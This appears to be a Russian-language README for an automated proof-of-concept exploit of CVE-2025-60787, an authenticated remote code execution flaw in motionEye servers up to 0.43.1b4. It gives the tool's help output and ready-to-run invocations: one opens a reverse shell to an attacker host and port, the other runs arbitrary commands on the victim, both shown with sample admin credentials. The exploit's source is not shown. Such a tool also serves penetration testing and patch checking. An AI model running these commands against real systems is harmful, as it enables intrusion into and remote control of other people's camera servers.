
Автоматизированное PoC для CVE-2025-60787, обеспечивающее аутентифицированное удаленное выполнение кода на серверах motionEye до версии 0.43.1b4, с режимами обратной оболочки и выполнения команд.
PoC для CVE-2025-60787 — это уязвимость авторизованного удаленного выполнения кода (Authenticated RCE) в motionEye для всех затронутых версий до 0.43.1b4 (включительно).
Это автоматизированный PoC для уязвимости, описанной в этом репозитории. Авторство: prabhatverma47.
Скрипт имеет 2 команды, которые эксплуатируют уязвимость. Одна команда под названием revshell отправляет обратную оболочку (reverse shell), а другая команда command напрямую выполняет команды, используя эту CVE.
❯ python3 CVE-2025-60787.py -h
usage: CVE-2025-60787.py [-h] {revshell,command} ...
PoC for CVE-2025-60787 -- Authenticated RCE in motionEye by gunzf0x
positional arguments:
{revshell,command} Choose between send a reverse shell or (attempting to) run commands
revshell Attempt to send a reverse shell using CVE-2025-60787 vuln
command Execute a command remotely using CVE-2025-60787 vuln
options:
-h, --help show this help message and exit
Используйте команду revshell для получения оболочки. Например:
python3 CVE-2025-60787.py revshell --url 'http://10.10.10.10:8765' --user 'admin' --password 'StrongPassw0rd123!' -i 10.10.10.15 --port 9001
Где 10.10.10.10 — целевая машина (машина, на которой запущен motionEye), 10.10.10.15 — наша атакующая машина, а 9001 — порт, который мы слушаем для перехвата обратной оболочки.
Если вместо обратной оболочки мы хотим удалённо выполнить другие команды, можно использовать параметр command. Например, выполнить команду ping -c1 10.10.10.15 на машине жертвы:
python3 CVE-2025-60787.py command --url 'http://10.10.10.10:8765' --user 'admin' --password 'StrongPassw0rd123!' -e 'ping -c1 10.10.10.15'
Где 10.10.10.10 — машина, на которой запущен motionEye.
Используйте этот скрипт всегда на свой собственный риск.
Будьте этичны (: